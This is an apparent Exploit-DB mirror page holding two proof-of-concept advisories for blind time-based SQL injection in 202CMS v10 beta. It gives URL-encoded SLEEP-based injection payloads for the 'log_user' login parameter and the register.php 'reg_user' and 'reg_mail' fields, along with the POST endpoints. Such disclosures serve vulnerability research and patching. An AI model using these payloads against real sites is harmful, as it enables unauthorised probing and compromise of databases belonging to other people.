bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/46579.txt
Offensive Security 7bd54d5a91 DB: 2019-03-21 
10 changes to exploits/shellcodes

NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow
Netartmedia PHP Car Dealer - SQL Injection
Netartmedia PHP Real Estate Agency 4.0 - SQL Injection
Netartmedia Jobs Portal 6.1 - SQL Injection
Netartmedia PHP Dating Site - SQL Injection
Netartmedia PHP Business Directory 4.2 - SQL Injection
202CMS v10beta - Multiple SQL Injection
PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control
PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery
Netartmedia Deals Portal - 'Email' SQL Injection
2019-03-21 05:02:08 +00:00

50 lines
No EOL
2.5 KiB
Text
Raw Blame History

===========================================================================================
# Exploit Title: 202CMS - 'log_user' SQL Inj.
# Dork: N/A
# Date: 20-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/b202cms/
# Software Link: https://sourceforge.net/projects/b202cms/
# Version: v10 beta
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: 202CMS is small, but functionally CMS. It is based
on Twitter Bootstrap
This CMS was built by Konrad and is powered by MySQLi and PHP. 202CMS is
highly customizable
and extremely easy to setup. The script is not finished, but soon I'm
going to finish it.
===========================================================================================
# POC - SQLi (blind)
# Parameters : log_user
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# POST Method : http://localhost/202cms10beta/index.php
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: 202CMS - 'register.php' SQL Inj.
# Dork: N/A
# Date: 20-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: https://sourceforge.net/projects/b202cms/
# Software Link: https://sourceforge.net/projects/b202cms/
# Version: v10 beta
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: 202CMS is small, but functionally CMS. It is based
on Twitter Bootstrap
This CMS was built by Konrad and is powered by MySQLi and PHP. 202CMS is
highly customizable
and extremely easy to setup. The script is not finished, but soon I'm
going to finish it.
===========================================================================================
# POC - SQLi (blind)
# Parameters : register.php, reg_user,reg_mail
# Attack Pattern :
1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f
# Attack Pattern : %27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27
# POST Method : http://localhost/202cms10beta/register.php
===========================================================================================
Reference in a new issue View git blame Copy permalink